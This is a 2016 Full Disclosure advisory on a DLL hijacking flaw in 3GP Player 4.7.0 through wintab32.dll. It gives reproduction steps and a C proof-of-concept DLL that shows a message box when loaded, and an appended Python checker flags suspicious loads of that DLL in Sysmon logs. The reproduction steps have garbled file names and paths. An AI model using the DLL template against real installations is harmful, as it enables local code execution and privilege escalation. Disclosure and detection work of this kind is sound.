List: full-disclosure
Subject: [FD] 3GP Player 4.7.0 - DLL Hijacking Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-09-23 9:37:26
Message-ID: 9c36d1b5-0fbe-f0aa-c73c-24ea55fbc9fc () vulnerability-lab ! com
Document Title:
===============
3GP Player 4.7.0 - DLL Hijacking Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1955
Release Date:
=============
2016-09-23
Vulnerability Laboratory ID (VL-ID):
====================================
1955
Common Vulnerability Scoring System:
====================================
5.6
Product & Service Introduction:
===============================
3GP Player is a player specialized in videos in the 3GP format widely used by mobile phones. The 3GP
format and its variants (3GPP, 3GPP2, etc.) are used by many mobile phone manufacturers to
store video. 3GP provides an easy way to play these videos on your PC. In use, 3GP Player
disappoints with its overly rudimentary interface. It offers only opening files and links to
websites that host videos for mobile.
(Copy of the Vendor Homepage: http://www.reganam.com/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a dll injection vulnerability in
the official 3GP Player v4.7.0 software.
Vulnerability Disclosure Timeline:
==================================
2016-09-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Reganam Interactive
Product: 3GP Player - Software Client 4.7.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official 3GP Player v4.7.0
software. The issue allows local attackers to inject code into vulnerable libraries to compromise
the process or to gain higher access privileges.
Vulnerable Software:
[+] 3GP Player
Vulnerable Version(s):
[+] v4.7.0
Vulnerable Libraries:
[+] wintab32.dll
Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with a restricted system user
account and without user interaction. For security demonstration or to reproduce the
vulnerability, follow the provided information and steps below.
Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to wintab32.dll
2. Copy Linkinfo.dll to C:Program Files3GPplayer20113GP-player.exe
3. Launch 3GP Player.exe
4. Now the test messagebox executes
5. Successful reproduction of the local vulnerability!
PoC: Exploit
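#include <windows.h>

#define DllExport __declspec (dllexport)

/* Forward declaration: dll_hijack() is defined after DllMain. */
int dll_hijack(void);

/* Entry point called by the loader when the DLL is mapped into the process. */
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    dll_hijack();
    return 0;
}

/* Test marker: shows a message box to prove that the DLL was loaded. */
int dll_hijack(void)
{
    MessageBox(0, "DLL Hijacking By ZwX!", "DLL Message", MB_OK);
    return 0;
}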
Security Risk:
==============
The security risk of the dll injection vulnerability in the vulnerable software library is
estimated as medium. (CVSS 5.6)
Credits & Authors:
==================
ZwX - ( http://zwx.fr ) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its
suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability mainly for consequential or incidental damages so the
foregoing limitation may not apply. We do not approve or encourage anybody to break any
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial usage, of this file, resources or
information requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and other information on this website is
a trademark of the vulnerability-lab team & the specific authors or managers. To record, list,
modify, use or edit our material contact (admin@) to ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
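
Added example, not part of the original advisory or of Vulnerability Lab's material: a detection check for the load the advisory describes, run over image-load records that use Sysmon Event ID 7 field names (Image, ImageLoaded, Signed, SignatureStatus). The sample events, the C:\Apps\ExamplePlayer path and the trusted-directory list are constructed assumptions; only the name wintab32.dll comes from the advisory.

```python
import ntpath

# DLL names to watch; wintab32.dll is the library named in the advisory.
WATCHLIST = {"wintab32.dll"}
# Directories a legitimate system copy loads from (assumed default install).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed sample records using Sysmon Event ID 7 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Apps\ExamplePlayer\player.exe",
     "ImageLoaded": r"C:\Apps\ExamplePlayer\wintab32.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Apps\ExamplePlayer\player.exe",
     "ImageLoaded": r"C:\Windows\System32\Wintab32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Apps\ExamplePlayer\player.exe",
     "ImageLoaded": r"C:\Apps\ExamplePlayer\avcodec.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

def _parent(path):
    """Case-folded, normalised parent directory of a Windows path."""
    return ntpath.normcase(ntpath.normpath(ntpath.dirname(path)))

def classify_image_load(event):
    """Return a finding dict for a suspicious load, else None."""
    if ntpath.basename(event["ImageLoaded"]).lower() not in WATCHLIST:
        return None
    dll_dir = _parent(event["ImageLoaded"])
    if dll_dir in TRUSTED_DIRS:
        return None
    reasons = ["loaded from outside the system directories"]
    if dll_dir == _parent(event["Image"]):
        # The application directory is searched before the system directory.
        reasons.append("DLL sits in the application directory")
    signed = event.get("Signed", "false").lower() == "true"
    if not (signed and event.get("SignatureStatus") == "Valid"):
        reasons.append("no valid signature")
    return {"process": event["Image"], "dll": event["ImageLoaded"], "reasons": reasons}

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify_image_load, events) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["dll"], "loaded by", f["process"], "->", "; ".join(f["reasons"]))
```

A signed copy loaded from a driver directory outside System32 still produces a finding with a single reason, so the reason list can be used to rank alerts rather than to suppress them.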